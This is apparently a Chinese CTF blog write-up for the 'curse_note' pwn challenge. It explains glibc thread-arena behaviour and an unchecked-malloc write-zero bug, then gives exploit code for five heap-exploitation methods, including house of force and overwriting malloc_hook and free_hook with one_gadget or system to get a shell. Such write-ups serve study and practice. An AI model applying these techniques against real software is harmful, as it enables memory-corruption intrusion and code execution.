记录一下解题过程,将大佬们wp的几句话扩展一下...以及新发现的一些东西...篇幅较长...感觉自己又写了一篇只有自己能看懂的文章-。-...
malloc一个很大的空间时,int_malloc会返回null
从而去调用arena_get_retry分配新的arena,再次尝试去分配内存,当然最后分配也是失败的
一旦分配了新的arena,之后的堆操作会使用这个arena进行操作,可以参考arena_get函数
新的arena的查看,p &main_arena->next 就可以找到新的arena的地址,进行查看
漏洞点在new_note的malloc地方,malloc的size没有被限制,也没有校验malloc的返回值
导致*((_BYTE *)qword_202050[v1] + size - 1) = 0;
,任意地址写0
1.chunk块在free和malloc的时候没有对立面的内容进行清空,所以很容易可以泄露出main_arena的地址,进而获取libc的基址
2.由于要使用任意地址写0这个操作,必定要malloc(big_size),后续的操作都会在t_arena上进行。所以先将chunk移到t_arena上,然后泄露t_arena的基址
3.这个题目,总共找到了五种解题方法(getshell或者成功写malloc_hook视为解题成功)
3.1.这个题目一共只能申请三个chunk,使用chunka、chunkb、chunkc代替。思路为使用chunkb修改chunkc的pre_size,pre_size覆盖chunka,chunkb。然后将chunkc的inuse位写0,free(chunkc)达到conslidate(chunka+chunkb+chunkc)的目的,此时可以通过malloc切割chunkabc来写chunkb
3.2.和第一种类似,也是将chunkc in use位写0,通过free(chunka),之后通过unlink 去consolidate(chunkb),让chunka和chunkb合并。使用malloc切割chunkab来写chunkb
3.3.修改t_arena中top chunk的地址,在chunka中伪造一个top chunk,在t_arena的top chunk地址最低位写0,这个地址刚好落在chunka内,如果此时在申请一个chunkc,就会造成chunkb和chunkc的overlap,就可以使用chunkc去修改chunkb。完成fastbin attack。
3.4.house of force。修改top chunk size,通过malloc 将top chunk size推向高地址free_hook,然后计算好值,使得free_hook值刚好为system_addr,这样在free()的时候就可以条用system来getshell了
3.5.修改t_arena中unsorted bin上chunkb的位置,伪造出一个fake chunkb,这个fake chunkb和chunka存在overlap,然后就可以完成fastbin attack
使用chunkb去写chunkc的pre_size,chunkd防止top chunk和chunkc合并了,此时chunka和chunkc都挂在unsortedbin上。
new(0,0x98,'A'*0x97)
new(1,0x68,'B'*0x60+p64(0x140))
new(2,0xf0,'C'*0xef)
#like off-by-one-null
delete(1)
new(1,0x30,'D'*0x30)
delete(2)
delete(0)
new(2,0x68,'B'*0x67)
chunkc在in use的情况下,size的值是105,因为是mmap分配的,free的情况下是101,此时将chunkc(freed)的in use位写0
将chunkc malloc回来,然后在free,触发consolidate,在0x7ffff00008b0的地方有一个size=0x241大小的chunk挂在unsortedbin上
之后申请都会先从这个chunk里面切割,last chunk。
new(0,heap_addr-0x78+0x9f8+1,'')
new(0,0xf0,'C'*0xef)
delete(0)
此时chunkabc就能够写chunkb了,此时可以单独free(chunkb),然后去写chunkb的fd,就可以将malloc_hook附近的地址放进chunkb的fd
delete(2)
malloc_hook=main_arena-0x78+5-0x18
new(0,0xe0,0xc0*'a'+p64(0)+p64(0x74)+p64(malloc_hook))
new两次,将malloc_hook附近的地址new出来就可以修改内容了,填成one_gadget getshell
new(2,0x68,'')
delete(1)
new(1,0x68,'A'*19+p64(0xdeedbeef))
这种方式和第一种类似,不过这里要绕过unlink里面double-linked list的机制
第一种方式里面自带了合法的fd和bk,所以不需要特意构造fd和bk绕过double-linked机制
这种解法要自己构造chunkb的fd+bk,让chunka和chunkb的fd+bk互相指向,来绕过double-linked机制
满足以下条件:
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
malloc_printerr (check_action, "corrupted double-linked list", P, AV);
所以需要在满足double-linked条件下,将chunkc的in use位修改成0,标志着chunkb没有被使用
那么在free(chunka)的时候,就会触发unlink机制,consolidate(chunka+chunkb)
new(0,0x98,'A'*0x98)
new(1,0x68,p64(0x7ffff00008b0)*2+'B'*0x50+p64(0x70))
new(2,0xf0,'C'*0xef)
delete(0)
new(0,heap_addr-0x78+0x9f8+1,'')
new(0,0xc0,p64(0x7ffff0000980)*2+'A'*0xb0)
chunka+chunkb合并之后放入unsortedbin,作为last chunk,之后申请小于size(chunka+chunkb)的chunk都会切割last chunk
delete(0) #consolidate(chunka+chunkb)
delete(1)
malloc_hook=main_arena-0x78+5-0x18
new(0,0xe0,0xc0*'a'+p64(0)+p64(0x75)+p64(malloc_hook))
之后将malloc_hook附近的chunk new出来,就可以改写malloc_hook了
new(1,0x68,'')
delete(0)
new(0,0x68,'A'*19+p64(0xdeedbeef))
在chunka里面伪造一个top chunk,让伪造topchunk的地址刚好落在0x7ffff0000900的地方
在申请一个chunkb,等待被overlap
new(0,main_arena,'') #让fastbin和unsortedbin和top chunk全部合并,方便布局
new(0,0x70,'A'*0x48+p64(0x20701))
new(1,0x60,'B'*0x60)
然后修改t_arena上面top chunk的地址,将最低位写0,由0x7ffff00009a0->0x7ffff0000900
new(2,heap_addr-0x78+0x79,'')
before:
after:
此时malloc的时候,就会从0x7ffff0000900的地方申请空间了,这样就会造成新申请的chunkc和chunkb overlap了。
红色框框里面的就是通过fake top chunk,malloc出来的chunkc
malloc_hook=main_arena-0x78+5-0x18
new(2,0x40,'a'*0x20+p64(0)+p64(0x75)+p64(malloc_hook))
new(1,0x68,'')
delete(2)
new(2,0x68,'A'*19+p64(0xdeedbeef))
从第三种方式可以知道可以控制top chunk的size,这样可以通过将top chunk的size修改的很大
在malloc(big_size)的时候不会崩溃
使得top chunk size刚好覆盖到free_hook,切top chunk size的值刚好为system_addr
所以top chunk size的大小应该为(free_hook的地址 - 当前top chunk 的地址) + system_addr
Q:为什么不用one_gadget?为什么不用malloc_hook?
由于top chunk size大小的地位是8字节对齐的,只可能为xxx1或者xxx9
这样跳转one_gadget的地址存在一定的偏移,在xxx1或xxx9的时候,不能成功getshell
这也是不能使用malloc_hook的原因,没有办法使用one_gadget。
之所以使用free_hook,是因为在free(chunkx)时,调用free_hook的时候,会将chunkx的data段作为free_hook的参数
所以这里使用system_addr,即free_hook(chunkx) -> system("/bin/sh")
以下是计算偏移:
main_arena=main_arena-0x58
malloc_hook=main_arena-0x10
#free(chunk)->free_hook(chunk->data)->system(/bin/sh)
free_hook=0x7ffff7bcd7a8#libc_base+libc['free_hook']
topchunk=heap_addr-0x78+0x900
#free(chunk)->free_hook()->onegadget
#one_gadget not fit
offset=free_hook-topchunk-0x10
success(hex(offset))
one_gadget=main_arena-0x3c4b20+0xf1147
system_addr=main_arena-0x3c4b20+0x45390
success(hex(one_gadget))
整理heap,伪造top chunk,修改t_arena中top chunk的地址,使得伪造topchunk变成真的topchunk
new(0,main_arena,'')
new(0,0x70,'/bin/sh'.ljust(0x48,'\x00')+p64(offset+system_addr+0x8))
new(2,heap_addr-0x78+0x79, '')
0x7fffff419230就是计算出来的top chunk size
之后new(offset),将top chunk size推向高地址free_hook,然后free(chunka)->free_hook(chunka_data)->system("/bin/sh")
new(2,offset,'')
delete(0)#getshell
修改t_arena中unsortedbin中的地址,让原本指向chunkb的指针,指向伪造的chunkb
伪造的chunkb的header是在chunka中构造,data区域覆盖chunkb的header。
由于要free(chunkb),之后还会malloc(big_size),malloc(big_size)会触发consolidate机制
consolidate机制会将chunkb(freed,fastbin)放到unsortedbin上,并且在其fd和bk上填充上unsortedbin的地址
所以伪造的chunkb也要在fd和bk上填充上相应的地址,所以第一个new会有p64(unsortedbin)
第二个new之所以还有一个p64(0x75),是为了接下来绕过free chunkb(fastbin)时,next size的检测机制
malloc_hook=main_arena-0x78+5-0x18
ubin=heap_addr-0x78+0xd8
new(0,main_arena,'') #整理heap区域
payload='A'*0x40+p64(0)+p64(0x75)+p64(ubin)+p64(ulbin)
new(0,0x78,payload)
new(1,0x68,'B'*0x30+p64(0)+p64(0x75)+'B'*0x18)
new(2,0x68,'C'*0xef)
delete(1)
此时还没有malloc(big_size),chunkb还放在fastbin上,fd和bk还没有被填充成unsortedbin的地址
malloc(big_size)的时候,会将fastbin上的chunkb转移到unsortedbin上,所以这个时候直接修改unsortedbin上的值
new(1,0x68,xxx)
这个从unsoterbin new出来的chunk块就是伪造的chunkb
然后将chunka和chunkb free掉,重新放进fastbin中
这个时候就可以通过chunka写chunkb了
new(1,heap_addr-0x78+0xf0+1,'')
new(1,heap_addr-0x78+0xe8+1,'')
new(1,0x68,'')
delete(1)
delete(0)
用chunka写chunkb,然后将malloc_hook附近的chunk malloc出来。
payload='A'*0x40 + p64(0)+p64(0x75)+p64(malloc_hook)
new(0,0x78,payload)
new(1,0x68,'')
delete(0)
one_gadget=main_arena-0x3c4b20+0x4526a
new(0,0x68,'A'*19 + p64(one_gadget))
delete(2)
p.sendline('1')#手动new
p.sendline('2')
p.sendline('2')
开始看wp的时候,看见两行泪和ElderWang用了两种不同的方式...后来看WRLab的时候...发现用了第三种方式...后来向zougfengyuan大佬(ElderWang)问一些不懂的问题的时候,一起讨论发现了另外两种解题方式...这篇博客用来记录和zou师傅聊天学习curse_note发现的一些神奇的解题方式,和zou师傅聊天学到了很多~...很早就想写了..奈何没时间+解法太多自己要理一理。pwn无止境,其乐无穷~